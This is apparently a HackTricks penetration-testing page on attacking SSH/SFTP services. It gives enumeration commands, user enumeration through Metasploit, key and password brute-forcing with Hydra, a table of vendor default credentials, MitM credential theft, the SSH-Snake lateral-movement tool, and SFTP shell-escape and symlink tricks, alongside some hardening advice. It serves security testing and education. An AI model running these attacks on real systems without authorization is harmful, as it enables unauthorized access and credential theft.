22 - Pentesting SSH/SFTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!

• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

Register - IntigritiRegister - Intigriti

Basic Information

SSH (Secure Shell or Secure Socket Shell) is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.

Default port: 22

22/tcp open  ssh     syn-ack

SSH servers:

• openSSH – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
• Dropbear – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
• PuTTY – SSH implementation for Windows, the client is commonly used but the use of the server is rarer
• CopSSH – implementation of OpenSSH for Windows

SSH libraries (implementing server-side):

• libssh – multiplatform C library implementing the SSHv2 protocol with bindings in Python, Perl and R; it’s used by KDE for sftp and by GitHub for the git SSH infrastructure
• wolfSSH – SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments
• Apache MINA SSHD – Apache SSHD java library is based on Apache MINA
• paramiko – Python SSHv2 protocol library

Enumeration

Banner Grabbing

nc -vn <IP> 22

Automated ssh-audit

ssh-audit is a tool for ssh server & client configuration auditing.

https://github.com/jtesta/ssh-audit is an updated fork from https://github.com/arthepsy/ssh-audit/

Features:

• SSH1 and SSH2 protocol server support;

• analyze SSH client configuration;

• grab banner, recognize device or software and operating system, detect compression;

• gather key-exchange, host-key, encryption and message authentication code algorithms;

• output algorithm information (available since, removed/disabled, unsafe/weak/legacy, etc);

• output algorithm recommendations (append or remove based on recognized software version);

• output security information (related issues, assigned CVE list, etc);

• analyze SSH version compatibility based on algorithm information;

• historical information from OpenSSH, Dropbear SSH and libssh;

• runs on Linux and Windows;

• no dependencies

usage: ssh-audit.py [-1246pbcnjvlt] <host>

   -1,  --ssh1             force ssh version 1 only
   -2,  --ssh2             force ssh version 2 only
   -4,  --ipv4             enable IPv4 (order of precedence)
   -6,  --ipv6             enable IPv6 (order of precedence)
   -p,  --port=<port>      port to connect
   -b,  --batch            batch output
   -c,  --client-audit     starts a server on port 2222 to audit client
                               software config (use -p to change port;
                               use -t to change timeout)
   -n,  --no-colors        disable colors
   -j,  --json             JSON output
   -v,  --verbose          verbose output
   -l,  --level=<level>    minimum output level (info|warn|fail)
   -t,  --timeout=<secs>   timeout (in seconds) for connection and reading
                               (default: 5)
$ python3 ssh-audit <IP>

See it in action (Asciinema)

Public SSH key of server

ssh-keyscan -t rsa <IP> -p <PORT>

Weak Cipher Algorithms

This is discovered by default by nmap. But you can also use sslcan or sslyze.

Nmap scripts

nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms 
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

• ssh

Brute force usernames, passwords and private keys

Username Enumeration

In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:

msf> use scanner/ssh/ssh_enumusers

Brute force

Some common ssh credentials here and here and below.

Private Key Brute Force

If you know some ssh private keys that could be used... let's try it. You can use the nmap script:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Or the MSF auxiliary module:

msf> use scanner/ssh/ssh_identify_pubkeys

Or use ssh-keybrute.py (native python3, lightweight and has legacy algorithms enabled): snowdroppe/ssh-keybrute.

Known badkeys can be found here:

ssh-badkeys/authorized at master · rapid7/ssh-badkeysGitHub

Weak SSH keys / Debian predictable PRNG

Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced. Pre-generated sets of keys generated on Debian systems affected by weak PRNG are available here: g0tmi1k/debian-ssh.

You should look here in order to search for valid keys for the victim machine.

Kerberos

crackmapexec using the ssh protocol can use the option --kerberos to authenticate via kerberos. For more info run crackmapexec ssh --help.

Default Credentials

Vendor	Usernames	Passwords
APC	apc, device	apc
Brocade	admin	admin123, password, brocade, fibranne
Cisco	admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin	admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix	root, nsroot, nsmaint, vdiadmin, kvm, cli, admin	C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link	admin, user	private, admin, user
Dell	root, user1, admin, vkernel, cli	calvin, 123456, password, vkernel, Stor@ge!, admin
EMC	admin, root, sysadmin	EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com	admin, root, vcx, app, spvar, manage, hpsupport, opc_op	admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huawei	admin, root	123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM	USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer	PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper	netscreen	netscreen
NetApp	admin	netapp123
Oracle	root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user	changeme, ilom-admin, ilom-operator, welcome1, oracle
VMware	vi-admin, root, hqadmin, vmware, admin	vmware, vmw@re, hqadmin, default

SSH-MitM

If you are in the local network as the victim which is going to connect to the SSH server using username and password you could try to perform a MitM attack to steal those credentials:

Attack path:

• Traffic Redirection: The attacker diverts the victim's traffic to their machine, effectively intercepting the connection attempt to the SSH server.

• Interception and Logging: The attacker's machine acts as a proxy, capturing the user's login details by pretending to be the legitimate SSH server.

• Command Execution and Relay: Finally, the attacker's server logs the user's credentials, forwards the commands to the real SSH server, executes them, and sends the results back to the user, making the process appear seamless and legitimate.

SSH MITM does exactly what is described above.

In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the Network Spoofing attacks.

SSH-Snake

If you want to traverse a network using discovered SSH private keys on systems, utilizing each private key on each system for new hosts, then SSH-Snake is what you need.

SSH-Snake performs the following tasks automatically and recursively:

1. On the current system, find any SSH private keys,

2. On the current system, find any hosts or destinations (user@host) that the private keys may be accepted,

3. Attempt to SSH into all of the destinations using all of the private keys discovered,

4. If a destination is successfully connected to, repeats steps #1 - #4 on the connected-to system.

It's completely self-replicating and self-propagating -- and completely fileless.

Config Misconfigurations

Root login

It's common for SSH servers to allow root user login by default, which poses a significant security risk. Disabling root login is a critical step in securing the server. Unauthorized access with administrative privileges and brute force attacks can be mitigated by making this change.

To Disable Root Login in OpenSSH:

1. Edit the SSH config file with: sudoedit /etc/ssh/sshd_config

2. Change the setting from #PermitRootLogin yes to PermitRootLogin no.

3. Reload the configuration using: sudo systemctl daemon-reload

4. Restart the SSH server to apply changes: sudo systemctl restart sshd

SFTP Brute Force

• SFTP Brute Force

SFTP command execution

There is a common oversight occurs with SFTP setups, where administrators intend for users to exchange files without enabling remote shell access. Despite setting users with non-interactive shells (e.g., /usr/bin/nologin) and confining them to a specific directory, a security loophole remains. Users can circumvent these restrictions by requesting the execution of a command (like /bin/bash) immediately after logging in, before their designated non-interactive shell takes over. This allows for unauthorized command execution, undermining the intended security measures.

Example from here:

ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Here is an example of secure SFTP configuration (/etc/ssh/sshd_config – openSSH) for the user noraj:

Match User noraj
        ChrootDirectory %h
        ForceCommand internal-sftp
        AllowTcpForwarding no
        PermitTunnel no
        X11Forwarding no
        PermitTTY no

This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access but also disabling all kind of port forwarding or tunneling.

SFTP Tunneling

If you have access to a SFTP server you can also tunnel your traffic through this for example using the common port forwarding:

sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

SFTP Symlink

The sftp have the command "symlink". Therefor, if you have writable rights in some folder, you can create symlinks of other folders/files. As you are probably trapped inside a chroot this won't be specially useful for you, but, if you can access the created symlink from a no-chroot service (for example, if you can access the symlink from the web), you could open the symlinked files through the web.

For example, to create a symlink from a new file "froot" to "/":

sftp> symlink / froot

If you can access the file "froot" via web, you will be able to list the root ("/") folder of the system.

Authentication methods

On high security environment it’s a common practice to enable only key-based or two factor authentication rather than the simple factor password based authentication. But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling publickey on openSSH configuration and setting it as the default method but not disabling password. So by using the verbose mode of the SSH client an attacker can see that a weaker method is enabled:

ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

For example if an authentication failure limit is set and you never get the chance to reach the password method, you can use the PreferredAuthentications option to force to use this method.

ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Review the SSH server configuration is necessary to check that only expected methods are authorized. Using the verbose mode on the client can help to see the effectiveness of the configuration.

Config files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

• https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
• https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2

References

• You can find interesting guides on how to harden SSH in https://www.ssh-audit.com/hardening_guides.html
• https://community.turgensec.com/ssh-hacking-guide

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

Register - IntigritiRegister - Intigriti

HackTricks Automatic Commands

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
  Name: Hydra Brute Force
  Description: Need Username
  Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
   
Entry_2:
  Name: consolesless mfs enumeration
  Description: SSH enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
   

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.